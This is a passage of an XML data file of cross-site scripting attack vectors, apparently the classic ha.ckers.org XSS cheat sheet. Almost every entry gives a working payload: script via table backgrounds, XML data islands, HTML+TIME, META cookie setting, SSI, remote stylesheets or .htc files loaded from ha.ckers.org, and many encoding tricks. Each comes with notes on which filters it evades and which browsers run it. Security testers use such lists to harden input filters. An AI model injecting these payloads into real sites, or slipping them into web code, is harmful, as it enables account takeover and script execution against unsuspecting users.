<desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won&apos;t work unless there is some content on the page other than the vector itself, so you&apos;ll need to add a single letter to the page to make it work if it&apos;s an otherwise blank page.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Remote Stylesheet 2</name>
<code>&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Remote Stylesheet 3</name>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Remote Stylesheet 4</name>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>TABLE</name>
<code>&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;</code>
<desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>TD</name>
<code>&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;</code>
<desc>TD background.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>XML namespace</name>
<code>&lt;HTML xmlns:xss&gt;
&lt;?import namespace=&quot;xss&quot; implementation=&quot;http://ha.ckers.org/xss.htc&quot;&gt;
&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
&lt;/HTML&gt;</code>
<desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>XML data island w/CDATA</name>
<code>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;</code>
<desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>XML data island w/comment</name>
<code>&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;&gt;&lt;/SPAN&gt;</code>
<desc>XML data island with comment obfuscation (doesn&apos;t use CDATA fields, but rather uses comments to break up the javascript directive)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>XML (locally hosted)</name>
<code>&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;</code>
<desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>XML HTML+TIME</name>
<code>&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt;
&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;
&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; &lt;/BODY&gt;&lt;/HTML&gt;</code>
<desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Commented-out Block</name>
<code>&lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert(&apos;XSS&apos;);&lt;/SCRIPT&gt;
&lt;![endif]--&gt;</code>
<desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Cookie Manipulation</name>
<code>&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;</code>
<desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where &lt;META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim&apos;s cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Local .htc file</name>
<code>&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;</code>
<desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Rename .js to .jpg</name>
<code>&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Assuming you can only fit in a few characters and it filters against &quot;.js&quot; you can rename your JavaScript file to an image as an XSS vector.</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>SSI</name>
<code>&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;</code>
<desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don&apos;t need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>PHP</name>
<code>&lt;? echo(&apos;&lt;SCR)&apos;;
echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>JavaScript Includes</name>
<code>&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;</code>
<desc>&amp;JavaScript includes (works in Netscape 4.x).</desc>
<label>Other Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Character Encoding Example</name>
<code>&lt;
%3C
&amp;lt
&amp;lt;
&amp;LT
&amp;LT;
&amp;#60
&amp;#060
&amp;#0060
&amp;#00060
&amp;#000060
&amp;#0000060
&amp;#60;
&amp;#060;
&amp;#0060;
&amp;#00060;
&amp;#000060;
&amp;#0000060;
&amp;#x3c
&amp;#x03c
&amp;#x003c
&amp;#x0003c
&amp;#x00003c
&amp;#x000003c
&amp;#x3c;
&amp;#x03c;
&amp;#x003c;
&amp;#x0003c;
&amp;#x00003c;
&amp;#x000003c;
&amp;#X3c
&amp;#X03c
&amp;#X003c
&amp;#X0003c
&amp;#X00003c
&amp;#X000003c
&amp;#X3c;
&amp;#X03c;
&amp;#X003c;
&amp;#X0003c;
&amp;#X00003c;
&amp;#X000003c;
&amp;#x3C
&amp;#x03C
&amp;#x003C
&amp;#x0003C
&amp;#x00003C
&amp;#x000003C
&amp;#x3C;
&amp;#x03C;
&amp;#x003C;
&amp;#x0003C;
&amp;#x00003C;
&amp;#x000003C;
&amp;#X3C
&amp;#X03C
&amp;#X003C
&amp;#X0003C
&amp;#X00003C
&amp;#X000003C
&amp;#X3C;
&amp;#X03C;
&amp;#X003C;
&amp;#X0003C;
&amp;#X00003C;
&amp;#X000003C;
\x3c
\x3C
\u003c
\u003C</code>
<desc>All of the possible combinations of the character &quot;&lt;&quot; in HTML and JavaScript. Most of these won&apos;t render, but many of them can get rendered in certain circumstances (standards are great, aren&apos;t they?).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support:</browser>
</attack>
<attack>
<name>Case Insensitive</name>
<code>&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;</code>
<desc>Case insensitive XSS attack vector.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>HTML Entities</name>
<code>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</code>
<desc>HTML entities (the semicolons are required for this to work).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Grave Accents</name>
<code>&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;</code>
<desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don&apos;t know about grave accents).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Image w/CharCode</name>
<code>&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</code>
<desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>UTF-8 Unicode Encoding</name>
<code>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</code>
<desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Long UTF-8 Unicode w/out Semicolons</name>
<code>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</code>
<desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&amp;#XX;", since most people don&apos;t know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&amp;#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I&apos;ve seen this in the wild).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>DIV w/Unicode</name>
<code>&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;</code>
<desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Hex Encoding w/out Semicolons</name>
<code>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</code>
<desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&amp;#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>UTF-7 Encoding</name>
<code>&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-</code>
<desc>UTF-7 encoding - if the page that the XSS resides on doesn&apos;t provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don&apos;t need the charset statement if the user&apos;s browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google&apos;s custom 404 script.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Escaping JavaScript escapes</name>
<code>\&quot;;alert(&apos;XSS&apos;);//</code>
<desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: &lt;SCRIPT&gt;var a=&quot;$ENV{QUERY_STRING}&quot;;&lt;/SCRIPT&gt; and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read &lt;SCRIPT&gt;var a=&quot;&quot;;alert(&apos;XSS&apos;);//&quot;;&lt;/SCRIPT&gt; which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>End title tag</name>
<code>&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;</code>
<desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>STYLE w/broken up JavaScript</name>
<code>&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;</code>
<desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Embedded Tab</name>
<code>&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Embedded tab to break up the cross site scripting attack.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Embedded Encoded Tab</name>
<code>&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Embedded Newline</name>
<code>&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc>
<label>Embedded Character Attacks</label>
